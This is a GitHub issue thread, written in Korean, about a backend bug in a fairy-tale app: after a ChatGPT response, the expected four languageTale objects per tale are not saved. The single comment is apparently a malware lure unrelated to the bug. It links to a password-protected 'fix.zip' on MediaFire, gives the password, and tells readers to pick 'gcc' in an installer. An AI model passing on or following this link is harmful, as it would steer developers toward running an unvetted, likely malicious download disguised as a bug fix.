### ISSUE TITLE
[BUG] chatgpt 응답은 정상적으로 받았으나 형식상 오류 등의 문제로 동화 객체가 제대로 생성되지 않음

### ISSUE THREAD

**Issue by hayeongKo** [GlowTales/GlowTales-Server#96]
### 🐞 버그 설명
tale은 정상적으로 저장되나 languageTale 객체가 저장되지 않음 -> 애초에 존재하지 않음.

### 💭 예상된 결과
tale 하나당 languageTale이 4개씩 저장되어야 함

### 🔜 추가 내용
languageTale 객체가 4개 생성이 되지 않는 경우 rollback

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
